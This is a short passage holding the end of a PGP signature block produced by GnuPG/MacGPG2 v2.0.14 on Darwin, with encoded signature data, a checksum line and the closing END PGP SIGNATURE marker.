Version: GnuPG/MacGPG2 v2.0.14 (Darwin)
iF4EAREIAAYFAk1IQjoACgkQQXnnBKKRMNCpdQEAg/vWtP38VKH2ZDeL9QMQfx6E
M8nIZdeL2XGonJpT60IA/0APzTbZPE+9rWTi1Z0lJqIgCjHls3jo+sGQWSPvxxkS
=Ur/Y
-----END PGP SIGNATURE-----